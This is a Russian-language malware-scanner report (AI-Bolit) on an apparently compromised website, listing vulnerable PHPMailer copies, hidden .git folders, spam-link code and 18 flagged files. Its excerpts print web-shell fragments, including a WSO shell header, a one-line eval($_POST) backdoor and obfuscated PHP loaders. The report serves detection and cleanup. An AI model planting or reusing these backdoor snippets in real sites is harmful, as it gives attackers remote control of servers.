Отчет сканера AI-Bolit v20171003: /home/petun/web/semkapital.ru/ (1/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 3 m . Сканирование начато 12-10-2017 в 21:50:49, сканирование завершено 12-10-2017 в 21:54:06
Всего проверено 4503 директорий и 16138 файлов. Использовано памяти при сканировании: 8.38 Mb.
Сводный отчет
Вредоносных скриптов18
Исполняемых файлов13
Пропущенных больших файлов3
Скрытых файлов4
Рекламных ссылок и кодов2
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Также выполните дополнительный анализ новым веб-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Уязвимости в скриптах (3)
  • /home/petun/web/semkapital.ru/www1/core/model/modx/mail/phpmailer/class.phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/class.phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/class.phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • Эти файлы могут быть вредоносными или хакерскими скриптами (18)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…./COCO | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |-<br>-| K3C0T | SIM0D | LITLE H4XORZ | Antonio HsH |-</font><p><center><table width='100%' border='2'><tr><td
    17/05/2017 09:22:54
    17/05/2017 09:22:54
    17.18 Kb
    3bffa2d7ba41e6422fefc60682d290f9e3df7525
    x
    1495012974
    id_16a5faf7
    [x] 1 <?php /* WSO [2.6] */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63
    16/05/2017 12:36:20
    16/05/2017 12:36:20
    112.62 Kb
    c425ba1c95f0db60d60b29e475999f9a3b0fa7aa
    x
    1494938180
    id_8da3d97c
    [x] BIG FILE. SKIPPED.
    16/05/2017 16:05:47
    16/05/2017 16:05:47
    833.51 Kb
    de37ec9087cb19104e458a8a95057058c54d7126
    x
    1494950747
    id_big_1
    [x] 1<?php echo '123321.txt';?><?php  eval($_POST['admins']);?
    17/05/2017 00:48:33
    17/05/2017 00:48:33
    63 b
    2e9c8ba29bcbeb176b18f02bb72bab294bb9abf0
    x
    1494982113
    id_1328eef6
    [x] 1…ERVER['HTTP_HOST'])]).';');$_bvaajy($sdkarvn);function bvaajy($ufjtkt,$ejmpjwk){ return$ufjtkt^str_repeat($ejmpjwk,ceil(strlen($ufjtkt) / strlen($ejmpjwk)));}?
    24/08/2017 21:30:18
    20/04/2017 10:21:14
    84.57 Kb
    d815005f10035ba125080d95bb240dfc92fc53ed
    x
    1492683674
    id_0d5be1de
    [x] 2…xP%Eq·+!8a·iWuJ?V|yRMZsh/459Q0(G·X;#\KT)j[,bd"Bzv`1]>f7N$}.mkD^UOYw3LCn{tc·'2_" ;$GLOBALS[$GLOBALS['w1c70f'][33].$GLOBALS['w1c70f'][28].$GLOBALS['w1c70f'][49].
    24/08/2017 19:20:42
    20/04/2017 10:21:14
    10.91 Kb
    55af6f9bf701d4eb70b4819b2cc1f100d9563429
    x
    1492683674
    id_af497d3d
    [x] 2…zQ#?SV!FU"5^m]\oW9JNu8i-·B:wnxr4eO3R_}[>·,0sM/$.k;7PYEL2Ta`HjbZh&fdCq·1D·AX+)6" ;$of71af328[$of71af328['h3722d'][12].$of71af328['h3722d'][85].$of71af328['h3722
    24/08/2017 19:20:53
    20/04/2017 10:21:12
    17.03 Kb
    15eca9b114c184e073f91a68e85aa8123b51c364
    x
    1492683672
    id_af497d3d
    [x] 2…8,EJYgzhe?[U`Wcu=3T*j6.21y9:/%-mF$QPM#&}i|4doB(KR_HsaIqVw]t+··X·)<ZS7f'Lr5vA^" ;$a4337758[$a4337758['j423ce10'][90].$a4337758['j423ce10'][33].$a4337758['j423c
    24/08/2017 19:20:44
    28/08/2013 12:22:28
    12.78 Kb
    edf5b72301fcb55429011ac5ffd7b081f5165c06
    x
    1377692548
    id_af497d3d
    [x] 2….[Xc7P!\oG9(W/AMKu`f:pLdYC·6EVx8q%|· -z2&<·"=sjIBSJQweiU{·g^l*b>;DH_kOtr51y+a}N" ;$cb8487f6d[$cb8487f6d['c638'][16].$cb8487f6d['c638'][81].$cb8487f6d['c638'][95
    24/08/2017 19:20:58
    20/04/2017 10:21:12
    13.05 Kb
    127540654e806589f9b525d65f8c10857f9c927d
    x
    1492683672
    id_af497d3d
    [x] BIG FILE. SKIPPED.
    10/10/2017 21:28:16
    10/10/2017 21:28:16
    836.25 Kb
    a5fdcbb66729293e5e22a9bb3fbdd0223cfad348
    x
    1507670896
    id_big_1
    [x] 2…Y_Og9[w;l) P5vG*HdWFzM%Lra!i0(Z8·&X1V#x\E6h4^IeJ7Cnb·,s-T/2y$BDNj.+'S>tp{qKQ`U" ;$ve8a[$ve8a['o218c7a7'][25].$ve8a['o218c7a7'][13].$ve8a['o218c7a7'][6].$ve8a['
    24/08/2017 19:20:48
    20/04/2017 10:21:10
    20.72 Kb
    af550ad9a92a8e25b8781a0e0b5466f95f528afe
    x
    1492683670
    id_af497d3d
    [x] 2…AOS^!J,PYR2rI0x*]N|)·}zKsq>`·ZhWyFwdHlb"X7·.-L[9$oCG'c%V#\/(n_5u&aE63{Bt?:Q;m" ;$u524[$u524['bed473d'][85].$u524['bed473d'][16].$u524['bed473d'][85].$u524['be
    08/09/2017 01:05:56
    20/04/2017 10:21:10
    12.44 Kb
    954230a7db64bda5e06eb90c9ef1986c77467781
    x
    1492683670
    id_af497d3d
    [x] 2…i/5SsVF;mvxnt3fl4J"wr!p}8·a=?%|L_E.u>(TzDW2&d*-K\HIqk[P·6cOXQ<^B·Abyg7]1{+$`0·" ;$GLOBALS[$GLOBALS['d9d1'][7].$GLOBALS['d9d1'][86].$GLOBALS['d9d1'][18].$GLOBAL
    24/08/2017 19:20:46
    20/04/2017 10:21:14
    9.98 Kb
    230a7348f0d5fb3ee551e5bfede364f54e68d791
    x
    1492683674
    id_af497d3d
    [x] 2… j3eU1B$ROm.&5y{=;`P"QXE,|Ki_to>kY]#W<4z+cp%DIh·)b?\:J/M^lgs*GS·!V·7f6uZA0dw9N" ;$gf7a[$gf7a['m61b'][30].$gf7a['m61b'][24].$gf7a['m61b'][16].$gf7a['m61b'][88].
    24/08/2017 19:20:36
    20/04/2017 10:21:10
    14.57 Kb
    cf140db0c36649ee4d9a65c0a4150c69ce8c0783
    x
    1492683670
    id_af497d3d
    [x] 2…/wC0J+K}1.s[B:8·fDpW{··(Vl7#nSjgO\<q6"mby2L?Q)]T&3zEo 5Px|MN!vuer=^A·*'iF4Y$ZH" ;$GLOBALS[$GLOBALS['ladbb5d9a'][9].$GLOBALS['ladbb5d9a'][93].$GLOBALS['ladbb5d9
    24/08/2017 19:20:51
    20/04/2017 10:21:14
    11.79 Kb
    af55aa597abaa7973b7843e662d3db500d19ffcb
    x
    1492683674
    id_af497d3d
    [x] 2…a'nj_guoB>?y60)|8{1Afsr%/.9e]I3·zt:&L kZ}iJ#V=XmU!,T·h;·WE·M(DY<R+cvOCFl*H$P[G" ;$GLOBALS[$GLOBALS['o0196'][26].$GLOBALS['o0196'][37].$GLOBALS['o0196'][8].$GLO
    24/08/2017 19:20:34
    20/04/2017 10:21:14
    10.42 Kb
    2116a128b860246f65485d3e7b7c730533e098d4
    x
    1492683674
    id_af497d3d
    [x] 2…GIR -"+r1X3CF,\#98Z·P·dhT[bU'5OHM.a&4k}z·!u]7<oLgEcp_x^2W*$iwD?tn`)·S;KYej(6:{v" ;$GLOBALS[$GLOBALS['sfd2b6'][3].$GLOBALS['sfd2b6'][63].$GLOBALS['sfd2b6'][3].$G
    05/10/2017 06:52:31
    20/04/2017 10:21:14
    10.93 Kb
    a4f4bdcc1611955a264192ae69bd4f591c915d59
    x
    1492683674
    id_af497d3d
    [x] 2…?/E<1Hij`l$g9f(y]FS3qaK_·!6·27}b,>N^#mMR;ev[wXtoJGO%*Y&PU=dVWLT85c)x+r-z\k:·" " ;$GLOBALS[$GLOBALS['v382e20'][64].$GLOBALS['v382e20'][48].$GLOBALS['v382e20'][9
    24/08/2017 19:20:56
    20/04/2017 10:21:14
    10.92 Kb
    5297eb1e1d38a49e675032451fab7e068e2c1820
    x
    1492683674
    id_af497d3d
    Обнаружены сигнатуры исполняемых файлов unix и нехарактерных скриптов. Они могут быть вредоносными файлами (13)
    /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/docs/generatedocs.sh
    /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/test/runfakepopserver.sh
    /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/test/fakesendmail.sh
    /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/test/fakepopserver.sh
    /home/petun/web/semkapital.ru/www/assets/images/accesson.php.suspected
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/docs/._generatedocs.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/docs/generatedocs.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/runfakepopserver.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/._runfakepopserver.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/._fakepopserver.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/._fakesendmail.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/fakesendmail.sh
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/test/fakepopserver.sh
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…err_class/sape.php');$o['charset']='UTF-8';$o['host']='semkapital.ru';$sape=new SAPE_client($o);unset($o);$str_sape=$sape->return_links();$buffer=preg_replace(
    07/10/2017 07:50:19
    04/11/2016 15:24:48
    2.02 Kb
    631aa81d7102e894843880933addcbaa5128fd38
    x
    1478273088
    id_z7603235
    1…array_change_key_case($data);}else{$this->_links=$data;}if(isset($this->_links[' __sape_delimiter__'])){$this->_links_delimiter=$this->_links['__sape_delimiter_
    26/09/2017 20:41:28
    26/09/2017 20:41:28
    18.70 Kb
    1d6208cf5581fe9bef25710fccfb44eb68e5745d
    x
    1506458488
    id_z5045385
    Скрытые файлы (4)
    /home/petun/web/semkapital.ru/www1/forms/.git
    /home/petun/web/semkapital.ru/www1/forms/vendor/phpmailer/phpmailer/.git
    /home/petun/web/semkapital.ru/www/forms/.git
    /home/petun/web/semkapital.ru/www/forms/vendor/phpmailer/phpmailer/.git
    Большие файлы (больше чем 600.00 Kb). Пропущено
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    16/05/2017 16:05:47
    16/05/2017 16:05:47
    833.51 Kb
    de37ec9087cb19104e458a8a95057058c54d7126
    x
    1494950747
    id_z8302633
    10/10/2017 21:28:16
    10/10/2017 21:28:16
    836.25 Kb
    a5fdcbb66729293e5e22a9bb3fbdd0223cfad348
    x
    1507670896
    id_z3231665
    13/09/2017 13:17:03
    13/09/2017 13:17:03
    834.64 Kb
    da39a3ee5e6b4b0d3255bfef95601890afd80709
    x
    1505308623
    id_z7541244
    Версии найденных CMS
    MODX v0.0
    MODX v0.0
    Wordpress v0.0
    MODX v0.0